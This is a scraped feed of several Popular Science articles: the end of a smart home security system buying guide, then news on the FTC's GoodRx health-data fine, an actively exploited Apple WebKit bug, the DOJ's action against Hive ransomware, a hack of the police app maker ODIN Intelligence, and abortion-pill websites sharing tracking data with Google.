The package itself includes door/window sensors and a motion sensor, with the kit being targeted to owners of two- or three-bedroom homes. While not difficult, installing the sensors can take some time as you manually pair and label each one within your system. You can install them using the included adhesive backing or a more traditional screw-in technique. The time investment should feel closer to “weekend project” than “plug’n’play” for the typical first-time user.

When combined with the optional professional monitoring from ADT, it can almost feel as if you have a dedicated housesitter while you’re away.

Best modular: Wyze Home Security Core Kit

Wyze

SEE IT

Why it made the cut: Wyze’s Home Security Core Kit is just that, a quality core kit that can be easily added to as needed.

Specs

  • Installation difficulty: Easy
  • Sensors: 2 door/window sensors, 1 motion sensor
  • 24/7 professional monitoring: $9.99/mo
  • Smart protocols: N/A

Pros

  • Very affordable and complete starter kit
  • Comes with three months of free professional monitoring
  • Can easily add on more sensors or cameras
  • Guided setup via Wyze app

Cons

  • Service plan essential
  • Only works in U.S.

If you prefer to wade through new technology instead of diving directly into the deep end, the Wyze Home Security Core Kit will be the best smart home security system for you. For starters, the core kit itself is very affordable, covers two entry points plus a room of your choice, and provides months of complimentary professional monitoring service to give you a taste of how Wyze works.

Once you’ve decided how much you like the system, you can start adding more components immediately. Finish off the rest of your home’s entry points with more door/window sensors, or transform your setup into a video surveillance system by adding a Wyze cam. Leak and home climate sensors are also available.

The modularity, as well as the stick-on setup guided by the Wyze app, gives the Wyze Home Security Core Kit a very DIY air to it. You can be confident that you, by yourself, should be able to install it. Unfortunately, the rugged individualism this inspires is dropped down a notch—it requires a 24/7 monitoring subscription for the device to truly shine. You’ll just have sensors, but the keypad won’t work after the three-month free trial runs out. The Wyze Cam add-on will also lose smart features and extended storage. Still, the service is cheaper than market averages, you probably wanted it anyway.

Most compatible: Abode Security System Starter Kit

Abode

SEE IT

Why it made the cut: Abode goes way beyond just Z-wave and Zigbee.

Specs

  • Installation difficulty: Easy
  • Sensors: 1 door/window sensor, 1 motion sensor
  • 24/7 professional monitoring: Between $7-$22/mo. (Semi-optional)
  • Smart protocols: Zigbee, Z-wave, Homekit, IFTTT

Pros

  • Connects and works with just about anything
  • Variable professional monitoring options
  • Sub-30-minute total setup time
  • Easily expandable

Cons

  • Limited sensors in starter kit
  • Reviews note poor customer service

Can’t decide between Zigbee and Z-wave, so want access to both? Not sure if you want to use Alexa or opt for a Google home security system? Need HomeKit or IFTTT support? It’s time to look at an Abode Security System, a home security system that connects with all of these in some way.

The Abode Security System Starter Kit is a perfect way to get set up with the system, as it includes the main hub, a couple of sensors, and a key fob. You’ll find it surprisingly easy to set up and get going—even technological turtles report installation times of under 30 minutes—but will quickly find yourself wanting other pieces if you don’t have, for example, home security cameras from an existing, compatible system. If you decide to stick with Abode products, you can choose from glass break sensors, water leak sensors, smoke alarms, and indoor/outdoor cameras to tailor the system to your needs.

While all owners have access to alerts and live video feeds, more “advanced” features—such as video storage—require you to subscribe to one of Abode’s plans, either the Standard (self-monitoring) or Pro (professional monitoring).

Best budget: Tolviviov Wi-Fi Door Alarm System

Tolviviov

SEE IT

Why it made the cut: This is the best smart home security system under $100.

Specs

  • Installation difficulty: Easy
  • Sensors: 5 door/window sensors
  • 24/7 professional monitoring: No
  • Smart protocols: N/A

Pros

  • Simple to use system with keychain fob and app control
  • Very loud alarm
  • Affordable for all pricing
  • No monthly payments

Cons

  • Supported by 2.4GHz Wi-Fi network only
  • Lower brand recognition

If you’re wanting to avoid overly techy solutions to your problems and save money in the long run while doing so, the Tolviviov Wi-Fi Door Alarm System is worth checking out. Tolviviov systems, in addition to being budget-friendly, also happen to be the best smart home security systems for elderly people due to their extremely loud alarm systems and manual keychain controls. It still has app functionality, including Alexa support, for those wanting a more modern feel.

Considering the price range, it shouldn’t be surprising that the Tolviviov system doesn’t have a professional monitoring system. However, this lack comes with a silver lining, as systems with professional monitoring on a recurring monthly subscription often tie other features into it. With the Tolviviov, what you see is what you get. A loud siren to alert you to entries, app alerts that tell you what sensor was disturbed, and the option for Alexa voice support. It’s simple, but it works.

The main concerns for the Tolviviov system are its connections and brand recognition. The Tolviviov only works with the 2.4GHz Wi-Fi band. Be prepared to isolate the 2.4GHz band. Lastly, the brand recognition just isn’t there yet. Sure, the super loud alarm will make burglars scram, but you won’t get the same response from the name “Tolviviov” that you will from an “ADT” sign in your yard or a Ring video doorbell near your front door.

What to consider when buying the best smart home security systems

From the surface, the best smart home security systems appear to be quite similar, just different collections of the same parts. This is compounded by the fact that, when things are running smoothly, our residential security systems blend into the background of our lives. However, if you do even a tiny amount of digging, you’ll see that there is more complexity in both the hardware and the included customer service plans than meets the eye.

Options for 24/7 professional monitoring

If you have a smart home security system that alerts you when intruders come into your home, or when your house faces other problems, you are all in the clear, right? While it is a nice thought, it is potentially untrue if you are incapacitated or unable to reach your phone to assess the threat (such as while out at work or on vacation).

Typically, 24/7 professional monitoring services come as part of a subscription fee, usually around $30 per month. While all systems retain some functionality without the subscription, others only provide limited service without the full subscription.

Zigbee and/or Z-wave connection

Much like Wi-Fi, Zigbee and Z-Wave represent frequency bands that can connect the pieces of your smart home security system together. Zigbee systems typically run faster, but burn through batteries quicker, while Z-Wave systems can have a bit of response delay but require less battery maintenance work.

In reality, which of the two systems is better depends on your overall network. If you have a lot of Z-Wave products already, going with another Z-Wave device is great because they are all mandated to work together. Zigbee devices can usually “find” each other but don’t always interconnect in a fully functioning way, sorta like pairing non-Apple headphones to your iPhone via Bluetooth. 

Another possibility includes using neither system and operating solely through Wi-Fi and the system’s own proprietary hub. If you are looking for a smart home security system and not a full smart home network, this should be fine. Alternatively, super-compatible systems can connect to both networks and have other connection options as well. Whether you want to go with Zigbee or Z-Wave or both is entirely up to you.

Branding and flags

Some smart home security systems have a flag to stick in your lawn to scare potential thieves away. Some customers are happy to see it, but others are skeptical about the usefulness of a sign to deter thieves, who might use the info to “crack” through the system.

What does the science say? Our friends at Bob Vila took a deep dive into the research on security signs and crime deterrence. Here are some of their findings:

  • ~25% of criminals will skip a home with a security sign.
  • ~50% of criminals will skip a home with a security sign and a visible camera.
  • The optimal locations for such signs are in a place visible from the street and in the backyard.
  • Branding matters. A recognizable or easily searched-for brand name works best to convince thieves your home is really protected.

Privacy

Whenever you bring something into your home, you want to feel comfortable about your privacy. This goes doubly so for home security products that can record and monitor the inside of your home. As such, you should pay particular attention to a brand’s privacy track record.

Take, for instance, the recent controversy over Anker’s eufy brand, which promised end-to-end encryption but didn’t deliver. If that wasn’t damaging enough, the company’s initial response was to merely change their privacy commitment statement. They’ve since come clean, but the sour taste still lingers.

For full transparency, this is not the only brand to have publicly suffered a privacy breach. In 2021, a former ADT technician pleaded guilty to charges of criminal spying while employed at the company. Important things to note here are how well ADT handled the situation compared to eufy, that their internal procedures and systems have since been changed to reduce the likelihood of a similar situation happening in the future, and that this was an incident involving a single employee and not the company at large. The ADT system in this guide does not include a camera.

FAQs

Q: How much does a smart home security system cost?

A smart home security system can cost anywhere from under $80 to over $400. You should also leave room in your budget for a monitoring subscription, which typically costs between $20 and $40. Overall, smart home security systems are highly affordable and shouldn’t outprice other smart gear for your home.

Q: What is the highest-rated home security system?

The highest-rated home security systems come from SimpliSafe and Ring. With new products and bundles being released regularly, as well as shifting prices, consumer ratings for individual bundles may fluctuate over time. That being said, highly regarded product bundles from both companies can receive a coveted 4.7 stars or higher on Amazon after hundreds (or even thousands) of reviews.

Q: Is smart home security worth it?

Smart home security is worth it if you are nervous about the safety of your home or neighborhood. Some systems can check for flooding and fires as well. With 24/7 professional monitoring, you also have access to a team that is ready to help you and alert authorities in case of an emergency. People wanting smaller, less extensive security should consider smart doorbells as a potential alternative.

Q: Is SimpliSafe better than Wyze?

It depends on what you want in a system. SimpliSafe is among the highest-rated smart home security systems, and the SimpliSafe 10-Piece Wireless Home Security System is our personal pick for the best smart home security system due to its high-quality performance and complete coverage. This isn’t to say that Wyze systems are bad, as the Wyze Home Security Core Kit is a premium choice for those that want a custom, modular system.

Final thoughts on the best smart home security systems

Getting one of the best smart home security systems in 2023 is not as difficult as in years past. Installation should be smoother due to the simplicity of wireless Zigbee, Z-Wave, and Wi-Fi connections that can integrate these systems with the existing smart home gadgets you already own. With app integration and voice support, you can get the truly convenient home security you desire.

The post The best smart home security systems of 2023 appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
GoodRx fined $1.5 million for allegedly selling users’ health data https://www.popsci.com/technology/ftc-goodrx-fine-facebook/ Thu, 02 Feb 2023 16:00:00 +0000 https://www.popsci.com/?p=509321
Close up of medicine jar tipped over with pills spread on glass table
The FTC alleges GoodRx's data misuse extended as far back as 2017. Deposit Photos

The company allegedly promised to keep users' medical info private, but instead sold it to third-party advertisers.

The post GoodRx fined $1.5 million for allegedly selling users’ health data appeared first on Popular Science.

]]>
Close up of medicine jar tipped over with pills spread on glass table
The FTC alleges GoodRx's data misuse extended as far back as 2017. Deposit Photos

GoodRx helps  millions of consumers find discounts for medical services like prescription drug deals and affordable telehealth since its debut in 2011. For years, the company’s official privacy policy stated it would only share consumers’ limited personal data with third-parties, but would never do so with users’ health information.

According to new Federal Trade Commission allegations, however, GoodRx ostensibly lied to over 55 million users by surreptitiously selling deeply personal medical information to companies as large as Facebook and Google. The company only changed its policies following details uncovered by consumer advocacy groups in 2020.

Per its enforcement action announced on Wednesday, the FTC claims GoodRx categorically mishandled users’ personal medical information, including users’ prescriptions and health conditions, as far back as 2017. Despite explicitly vowing it “would never share personal health information with advertisers or other third parties,” says the FTC, GoodRx instead sold this data to advertising companies and platforms including Google, Facebook, Branch, and Twilio to craft personalized ads.

[Related: How data brokers threaten your privacy.]

In August 2019, for example, the FTC detailed how GoodRx assembled lists of users who purchased specific medications, then uploaded their emails, phone numbers, and mobile ad IDs to Facebook. From there, the company matched them to account profiles and categorized them by the purchased meds, which they then targeted with personalized health-related advertisements.

The concerted deception strategies also included previously displaying a seal supposedly certifying its commitment to the Health Insurance Portability and Accountability Act of 1996 (HIPAA). GoodRx also purportedly misled the public about its adherence to the principles of the Digital Advertising Alliance, which forbids participating companies from sharing health information for advertising without explicit consumer consent. This also marks the FTC’s first enforcement action under the Health Breach Notification Rule, since GoodRx also failed to notify the public about unauthorized disclosures of individually identifiable health information to third-party advertisers.

“The fact that GoodRx has been endangering its users and abusing their trust is disgusting,” Caitlin Seeley George, Campaign Director for the digital rights advocacy group, Fight for the Future, wrote to PopSci via email. Apart from the ethical issues, George also described the situation as “terrifying, especially at a time when people are scared of how their personal health information could be used to accuse them of breaking draconian anti-abortion or anti-trans laws.”

[Related: Hive ransomeware extorted $100 million from victims. The DOJ just hit back.]

In a response released to the public, GoodRx representatives state, “We do not agree with the FTC’s allegations and we admit no wrongdoing” and claim that, “entering into the settlement allows us to avoid the time and expense of protracted litigation.” Representatives also claim, “the settlement with the FTC focuses on an old issue that was proactively addressed almost three years ago, before the FTC inquiry began.”

In a blog post published on GoodRx’s website, the company writes that it addressed the FTC’s privacy concerns in 2020, ahead of the agency’s investigation while also highlighting the ubiquity of data tracking strategies such as the controversial Facebook “pixel” tracking system.

The FTC’s proposed federal court order includes a $1.5 million civil penalty alongside a permanent ban on disclosing user health information with third parties for advertising. Other stipulations include user consent for any future information sharing, an order to direct third parties to permanently delete any data previously gathered through these methods, the institution of limited data retention policies alongside a mandated privacy program.

[Related: Chewy is doggedly trying to expand into pet telehealth.]

George contends that the comparatively meager fine for a company as large as GoodRx “will do nothing to make amends to the people whose privacy has been violated.” Instead, she reiterated her organization’s urging of lawmakers to pass comprehensive federal data privacy laws so that such violations are discouraged from happening again.

GoodRx’s official Privacy Policy was last updated in January, and currently includes disclaimers regarding its right to sell users’ information to third-party advertisers.

The post GoodRx fined $1.5 million for allegedly selling users’ health data appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Why you should update your iPhone ASAP, even if it is ancient https://www.popsci.com/technology/iphone-webkit-vulnerability/ Mon, 30 Jan 2023 23:00:00 +0000 https://www.popsci.com/?p=508540
iphone screen lockpad
Passwordless logins are coming to Apple, Google, and Microsoft devices and services. Yura Fresh / Unsplash

Old and new versions of Apple devices have been subject to a major vulnerability still in the wild.

The post Why you should update your iPhone ASAP, even if it is ancient appeared first on Popular Science.

]]>
iphone screen lockpad
Passwordless logins are coming to Apple, Google, and Microsoft devices and services. Yura Fresh / Unsplash

Over the past week, Apple has rolled out some important security updates—including updates to iOS 16, iOS 15, and even iOS 12 to protect iPhones from a major vulnerability that’s still in the wild. That extends to older iPhone models too.

Although the iPhone 5s was released back in 2013 and discontinued in 2016, it still gets the occasional crucial software update from Apple. The newest software for these older devices, iOS 12.5.7, was released last week and patches a bug with the catchy name of CVE-2022-42856 in older iPhones and iPads, including the iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation). 

For the newer versions of iPhones, CVE-2022-42856 was squashed at the end of November as part of iOS 16.1.2. It was also dealt with on other devices with the release of iOS 15.7.2, iPadOS 15.7.2, tvOS 16.2, and macOS Ventura 13.1. Basically, if you’ve been tapping “Remind Me Tomorrow” on your Apple updates for a few weeks, now is the time to do it. 

First spotted late last year by Clément Lecigne of Google’s Threat Analysis Group, CVE-2022-42856 is a bug in Apple’s browser engine, WebKit, that allows an attacker to create malicious web content that can execute code on iPhones, iPads, Macs, and even Apple TVs. While everyone is a little cagey about the specifics of the exploit so that more bad actors can’t figure it out, it has a “High” severity score. That’s on a scale that goes None, Low, Medium, High, and then Critical. It’s based on both how much control these kind of exploits give attackers and how easily and widely they can be implemented. 

Crucially, Apple said on January 23 that it has received reports that this issue is being “actively exploited.” In other words, there are hackers out there using it to target Apple devices—including older devices running iOS 12—so it’s best to update to stay safe.

As well as CVE-2022-42856, iOS 16.3, iPadOS 16.3, macOS Ventura 13.2, and watchOS 9.3, which were released last week, squash a long list of vulnerabilities. Among them are two more WebKit bugs that could allow attackers to execute malicious code, two macOS denial-of-service vulnerabilities, and two macOS kernel vulnerabilities that could be abused to reveal sensitive information, execute malicious code, or determine details about its memory structure—possibly allowing for further attacks. 

But these latest updates don’t just deal with bugs. After being announced last year, Apple has added support for security keys to Apple IDs. Basically, when you log in to your Apple ID, instead of getting a two-factor authentication (2FA) code sent to your phone which can be intercepted by hackers, you can use a hardware security key that connects to your Apple device over USB port, Lightning port, or NFC. It’s significantly more secure because an attacker would have to physically steal your security key and learn your password to gain access to your account. 

To get started with setting your phone up with a hardware security system, you need at least two FIDO certified security keys that are compatible with your Apple devices, just in case you lose one. Apple recommends the YubiKey 5C NFC or YubiKey 5Ci for most Mac and iPhone models, and the FEITAN ePass K9 NFC USB-A for older Macs. You also need your devices updated to iOS 16.3 and macOS Ventura 13.2. Once you’re ready, you can connect your security keys to your account in the Password & Security section of the relevant Settings app. 

The post Why you should update your iPhone ASAP, even if it is ancient appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Hive ransomeware extorted $100 million from victims. The DOJ just hit back. https://www.popsci.com/technology/doj-hive-ransomware-lawsuit/ Fri, 27 Jan 2023 18:00:00 +0000 https://www.popsci.com/?p=508145
Black gloves typing on laptop keyboard in front of screen showing computer code
Authorities reportedly thwarted over $130 million in ransomware attacks. Deposit Photos

Hospitals and public school systems are among the 1,500 affected targets.

The post Hive ransomeware extorted $100 million from victims. The DOJ just hit back. appeared first on Popular Science.

]]>
Black gloves typing on laptop keyboard in front of screen showing computer code
Authorities reportedly thwarted over $130 million in ransomware attacks. Deposit Photos

Federal officials announced the results of a months’ long infiltration campaign against a major international ransomware group called Hive on Thursday. The group’s numerous digital extortion schemes netted members over $100 million in payments. Since June 2021, Hive has subjected over 1,500 victims across 80 countries to attacks targeting critical infrastructure, healthcare, as well as financial firms and public school systems.

According to the Dept. of Justice filings, the FBI first gained access to Hive in July 2022, and soon amassed over 1,300 decryption keys they then provided to past and current victims, saving them an estimated $130 million in the process. Federal officials working with law enforcement organizations in Germany and the Netherlands have also succeeded in seizing and shutting down websites used by Hive members to communicate and coordinate attacks.

[Related: Hackers release data trove from police app.]

Ransomware campaigns function much as one might expect—users’ private and sensitive data is hacked and encrypted, then held indefinitely unless they pay the orchestrators. Often, this data still finds its way onto dark web marketplaces, as was the case with over 16,000 schoolchildren’s personal info in 2021.

Shuman Ghosemajumder, former Global Head of Product, Trust & Safety at Google, believes this week’s announcement is a positive development in countering ransomware gangs like Hive, while also highlighting just how advanced these organizations have become.

“The DOJ’s announcement today sheds light on how different groups were responsible for compromising machines (using everything from stolen passwords to phishing), building the ransomware toolkit, and administering the payment schemes,” Ghosemajumder told PopSci via email. Ghosemajumder says that although many still conjure images of lone hackers causing digital havoc, the public should be far more aware of increasingly complex networks of bad actors.

[Related: Hackers could be selling your Twitter data for the lowball price of $2.]

“Their revenue sharing scheme between cybercriminal groups reminds me of how we did revenue sharing at Google,” he writes, adding that organizations like Hive “are clearly mimicking legitimate businesses in many ways.”

Unfortunately, experts caution that this rare victory against ransomware gangs won’t put a wholesale end to Hive participants’ activities. Although the FBI maintains its investigations are ongoing and arrests are likely imminent, the decentralized, largely anonymous nature of these sorts of organizations ensures their ability to reform into new structures and campaigns over time. “In the grand scheme of things, it probably won’t put Hive out of business, but it’s about attrition and cost,” Jen Ellis, a co-chair of the cybersecurity industry partnership, Ransomware Task Force, told NBC News on Thursday.

“The complexity and scale of cybercrime today goes far beyond anything society has seen in the physical world, so it’s hard for most people to have intuition for how it works or how to deal with it,” adds Gosemajumder.

For now, however, at least some of the most concerted efforts to extort individuals and organizations online appears stymied, and could provide a much-needed reprieve from the digital landscape’s near-constant cybersecurity threats.

The post Hive ransomeware extorted $100 million from victims. The DOJ just hit back. appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
This app helped police plan raids. Hackers just made the data public. https://www.popsci.com/technology/odin-intelligence-data-hack/ Mon, 23 Jan 2023 17:00:00 +0000 https://www.popsci.com/?p=506968
Homeless campsite downtown Los Angeles, California.
Controversial law enforcement apps are at the center of a new, massive data hack. Deposit Photos

The trove reportedly includes thousands of audio recordings, photos, and reports.

The post This app helped police plan raids. Hackers just made the data public. appeared first on Popular Science.

]]>
Homeless campsite downtown Los Angeles, California.
Controversial law enforcement apps are at the center of a new, massive data hack. Deposit Photos

The information dissemination and transparency collective called Distributed Denial of Secrets (DDoSecrets) released a 19GB data trove over the weekend culled by hackers from apps utilized by law enforcement agencies for conducting raids and arrests on houseless populations. The mass of ODIN data reportedly includes thousands of audio recordings, photos, reports, and user info, alongside evidence linking ODIN’s CEO and founder to actual police operations.

The drop comes just days after news first broke that SweepWizard, a raid coordination app tool developed by ODIN Intelligence, accidentally left sensitive information regarding hundreds of police operations publicly accessible. This resulted in hackers defacing the company’s official website barely a week later.

[Related: Privacy advocates are worried about a newly unveiled pee-analysis gadget.]

ODIN’s founder and CEO Eric McCauley appeared to downplay the potential security flaw first reported by Wired on January 11. But hacktivists soon took advantage of the exploit, replacing the entire website with a single page of plain text graffiti alongside a message explaining their reasoning.

The perpetrators remain unknown, and claim that “all data and backups” for ODIN Intelligence “have been shredded,” although the data wipe has yet to be confirmed, according to TechCrunch. ODIN’s website is offline as of writing. SweepWizard is also currently pulled from the Apple App Store and Google Play.

According to DDoSecrets, some of that information appears to be intentionally inaccurate, such as listing officer names as “Captain America,” “Superman,” and “Joe Blow” alongside false phone numbers. Additionally, some of the dataset’s reports specifically name ODIN’s founder and his wife as participants in law enforcement operations via ODIN’s parent company, EJM Digital. According to Vice on Friday, McCauley was even listed as “commanding officer” in some of the reports.

[Related: Hackers could be selling your Twitter data for the lowball price of $2.]

In addition to the houseless population tracking data, the leak includes reams of information scraped from ODIN’s Sex Offender Notification and Registration (SONAR) app, which is frequently used by state and local police for remote sex offender tracking and management. One file also contains user login information containing two FBI email addresses.

The law enforcement tech company has long been criticized for its products and privacy evasion tactics. Last year, Motherboard reported that its “ODIN Homeless Management Information System” employed facial recognition technology to collect information on individuals, with a marketing brochure claiming that police used it to “identify even non-verbal or intoxicated individuals.” The tools were advertised in commercial materials as offering solutions to managing “problems” such as “degradation of a city’s culture,” “poor hygiene,” and “unchecked predatory behavior.”

The post This app helped police plan raids. Hackers just made the data public. appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Websites selling abortion pills are sharing sensitive data with Google https://www.popsci.com/health/abortion-pill-data-google/ Fri, 20 Jan 2023 02:00:00 +0000 https://www.popsci.com/?p=506360
While many think that health information is legally protected, U.S. privacy law does little to constrain the data that companies such as Google and Facebook can collect.
While many think that health information is legally protected, U.S. privacy law does little to constrain the data that companies such as Google and Facebook can collect. DepositPhotos

Some sites selling abortion pills use technology that shares information with third parties like Google. Law enforcement can potentially use this data to prosecute people.

The post Websites selling abortion pills are sharing sensitive data with Google appeared first on Popular Science.

]]>
While many think that health information is legally protected, U.S. privacy law does little to constrain the data that companies such as Google and Facebook can collect.
While many think that health information is legally protected, U.S. privacy law does little to constrain the data that companies such as Google and Facebook can collect. DepositPhotos

This article was originally featured on ProPublica.

ProPublica is a Pulitzer Prize-winning investigative newsroom. Sign up for The Big Story newsletter to receive stories like this one in your inbox. Series: Post-Roe America Abortion Access Divides the Nation

Online pharmacies that sell abortion pills are sharing sensitive data with Google and other third parties, which may allow law enforcement to prosecute those who use the medications to end their pregnancies, a ProPublica analysis has found.

Using a tool created by the Markup, a nonprofit tech-journalism newsroom, ProPublica ran checks on 11 online pharmacies that sell abortion medication to reveal the web tracking technology they use. Late last year and in early January, ProPublica found web trackers on the sites of at least nine online pharmacies that provide pills by mail: Abortion Ease, BestAbortionPill.com, PrivacyPillRX, PillsOnlineRX, Secure Abortion Pills, AbortionRx, Generic Abortion Pills, Abortion Privacy and Online Abortion Pill Rx.

These third-party trackers, including a Google Analytics tool and advertising technologies, collect a host of details about users and feed them to tech behemoth Google, its parent company, Alphabet, and other third parties, such as the online chat provider LiveChat. Those details include the web addresses the users visited, what they clicked on, the search terms they used to find a website, the previous site they visited, their general location and information about the devices they used, such as whether they were on a computer or phone. This information helps websites function and helps tech companies personalize ads.

But the nine sites are also sending data to Google that can potentially identify users, ProPublica’s analysis found, including a random number that is unique to a user’s browser, which can then be linked to other collected data.

“Why in the world would you do that as a pharmacy website?” said Serge Egelman, research director of the Usable Security and Privacy Group at the International Computer Science Institute at the University of California, Berkeley. “Ultimately, it’s a pretty dumb thing to do.”

Representatives for the nine sites did not respond to requests for comment. All were recommended on the popular website Plan C, which provides information about how to get abortion pills by mail, including in states where abortion is illegal. Plan C acknowledged that it does not have control over these sites or their privacy practices.

While many people may assume their health information is legally protected, U.S. privacy law does little to constrain the kind or amount of data that companies such as Google and Facebook can collect from individuals. Tech companies are generally not bound by the Health Insurance Portability and Accountability Act, known as HIPAA, which limits when certain health care providers and health plans can share a patient’s medical information. Nor does federal law set many limits on how companies can use this data.

Law enforcement can obtain people’s data from tech companies such as Google, whose privacy policies say the companies reserve the right to share users’ data with law enforcement. Google requires a court order or search warrant, which law enforcement can obtain with probable cause to believe a search is justified. The company received more than 87,000 subpoenas and search warrants in the U.S. in 2021, the most recent year available; it does not provide a breakdown of these requests by type, such as how many involved abortion medication.

In a statement, Steve Ganem, product director of Google Analytics, said: “Any data in Google Analytics is obfuscated and aggregated in a way that prevents it from being used to identify an individual and our policies prohibit customers from sending us data that could be used to identify a user.”

Google pledged last year that it would delete location history data related to people’s visits to abortion and fertility clinics, but the company has not announced any changes since then related to data involving abortion pill providers or how it handles government requests for data. A Google spokesperson did not respond when asked whether the company has turned over any data to law enforcement about users of online pharmacies that provide abortion medication or whether it has been asked to do so.

“This is problematic and dangerous — both the potential access that law enforcement has to figure out who is violating our new state bans and that we’ve let tech companies know so much about our private lives,” said Anya Prince, a law professor at the University of Iowa who focuses on health privacy. “It shows us how powerful this data is in scary ways.”

Medication abortion

Using medications to induce an abortion involves taking two drugs. Mifepristone blocks the hormone progesterone, effectively stopping the growth of the pregnancy. Misoprostol, taken a day or two later, helps the uterus contract, emptying it of pregnancy tissue. This drug combination is the most commonly used method of abortion, accounting for more than half of abortions in the U.S.

Demand for the drugs is expected to grow amid reproductive health clinic closures and the enactment of a cascade of state laws banning abortion since the Supreme Court overturned Roe v. Wade last June.

At least 13 states now ban all methods of abortion, including medication abortion, though some allow exceptions for medical emergencies, rape or incest. People who are unable to shoulder the cost of traveling to states where abortion is legal are increasingly turning to online pharmacies to buy abortion pills without prescriptions. The mail-order pills can be taken at home, and they’re generally cheaper than abortion services provided in clinics — about $200 to $470 from online pharmacies, compared to about $500 for a first-trimester abortion conducted in a clinic.

Approved by the U.S. Food and Drug Administration in 2000, mifepristone — the first tablet in the two-step regimen — can be used to help end pregnancies in their first 11 weeks. The agency initially restricted the drug, requiring patients to get it from clinicians in person.

Mifepristone became more accessible during the COVID-19 pandemic, when the FDA temporarily relaxed the requirement that people visit providers in person to get the drug. The agency scrapped the requirement altogether in December 2021, allowing people to obtain abortion medication through the mail after a telemedicine appointment.

Then, on Jan. 3, the FDA published new rules allowing retail pharmacies to dispense mifepristone to people who have prescriptions, potentially expanding access to medication abortion. But those rules do not help pregnant people in more than a dozen states where abortion bans prevent pharmacies from offering the drug.

A week later, Alabama’s attorney general said that anyone using abortion pills could be prosecuted under a state law that penalizes people for taking drugs while pregnant — despite the state’s abortion ban, which excludes abortion seekers and penalizes providers instead. He then appeared to back off his statement, saying the law would be used only to target providers.

Nineteen states already ban the prescription of abortion drugs through telehealth, meaning people in those states must see a clinician in person or find abortion medication online on their own. Many appear ready to do the latter. After a draft of the Supreme Court’s abortion decision leaked last May, internet search traffic for medication abortion surged. Dozens of people have posted descriptions online of their experiences getting abortion pills, some in restrictive states. One Reddit user recounted their ordeal on an abortion subgroup in October: “I’m in TX so i ordered through abortion RX. It said it’ll be here soon like 5-6 days. I’m extremely nervous I’m doing this by myself, but I’ve looked and don’t have a lot of time to make a decision. This is the fastest way.”

Just two states — Nevada and South Carolina — explicitly outlaw self-managed abortion. But that hasn’t stopped prosecutors in other states from charging people for taking abortion drugs.

Prosecutors have cited online orders of abortion pills as evidence in cases charging people with illegal abortions in several states, including Georgia, Idaho and Indiana. And in at least 61 cases from 2000 through 2020 spread across more than half the states in the country, prosecutors investigated people or ordered their arrest for allegedly self-managing abortions or helping someone else to do so, according to a report by If/When/How, a reproductive justice advocacy organization. In most of these cases, people had used medication for their abortions.

Those prosecutors interested in criminalizing abortion are aided by state and private surveillance.

“This is an entirely new era,” said Ari Waldman, a professor of law and computer science at Northeastern University. “We’re moving to a modern surveillance state where every website we visit is tracked. We have yet to conceptualize the entire body of laws that could be used to criminalize people getting abortions.”

Law enforcement can use people’s behavior when visiting websites that sell abortion pills as evidence to build cases against those suspected of having abortions. Investigations and charges in these cases overwhelmingly stem from reports to law enforcement by health care providers, trusted contacts or the discovery of fetal remains, legal experts say. Once authorities launch an investigation, they can use online searches for abortion pills as part of the evidence.

“This information can tell a district attorney that you went to an abortion website and you bought something,” Waldman said. “That might be enough to get a judge to get a warrant to take someone’s computer to search for any evidence related to whatever abortion-related crime they’re being charged with.”

This was true even under the more limited abortion restrictions under Roe. For example, in 2017, prosecutors in Mississippi charged Latice Fisher with second-degree murder after she lost her pregnancy at 36 weeks. Prosecutors used her online search history — including a search for how to buy abortion pills online — as evidence. Fisher’s murder charge was eventually dismissed.

“We have a private surveillance apparatus that is wide and is largely unregulated,” said Corynne McSherry, legal director at the Electronic Frontier Foundation, a nonprofit that promotes digital rights. “Now Google knows what you’re searching. This is a real threat. If any third party has your information, it means your data is no longer in your control and it could be sought by law enforcement. This is 100% a worry.”

Opting out

Many people aren’t aware of how to opt out of sharing their data. Part of the problem is that when users visit online pharmacies that share users’ information with third parties such as Google, their information can then be shared with law enforcement if allowed by the privacy policies of those third parties.

“The mere fact that you’ve used the online pharmacy to buy abortion medication, that info is now collected by Google and it is now subject to the privacy policy of Google such that you have no way of opting out of that, because it’s entirely separate from the website you went to,” Waldman said.

Users can install a web browser, such as Brave or Firefox, that offers privacy protections. They can also install browser extensions to block third-party trackers and adjust the privacy settings on their browsers. But these steps aren’t always foolproof. Tech companies can still subvert them using hidden tools that users cannot see, and they likely retain vast troves of data that are beyond users’ control.

“Individuals are not going to solve this problem; technical solutions aren’t going to solve this problem,” said Chris Kanich, associate professor of computer science at the University of Illinois at Chicago. “These trillion-dollar companies of the economy aren’t going anywhere. So we need policy solutions.”

Congressional lawmakers have spent years discussing a national data privacy standard. The bill that has made the most progress is the American Data Privacy and Protection Act. Introduced last June by a bipartisan group of lawmakers who intended to strengthen consumer data protections, the bill limited companies from using any sensitive data, including precise geolocation information or browsing histories, for targeted advertising or other purposes. Companies would have been required to get consumers’ express consent before sharing sensitive data with third parties. The legislation passed out of its assigned House committee in July.

Another bill, the My Body, My Data Act, also introduced last summer, would limit the reproductive health data that companies are allowed to collect, keep and disclose.

But neither bill has passed. The My Body, My Data Act had few, if any, Republican supporters. Plus, legislators couldn’t reach an agreement over whether the American Data Privacy and Protection Act should supersede state privacy laws such as the California Consumer Privacy Act of 2018, which provides data privacy protections for consumers in the state.

Privacy experts say the most effective way to protect users’ data is for online pharmacies that sell abortion medication to stop collecting and sharing health-related data.

Companies selling abortion pills should immediately stop sharing data with Google, said Cooper Quintin, senior staff technologist at the Electronic Frontier Foundation.

“Web developers may not have thought they were putting their users at risk by using Google Analytics and other third-party trackers,” Quintin said. “But with the current political climate, all websites, but especially websites with at-risk users, need to consider that helping Google, Facebook and others build up records of user behavior could have a potentially horrific outcome. You can’t keep acting like Roe is still the law of the land.”

The post Websites selling abortion pills are sharing sensitive data with Google appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
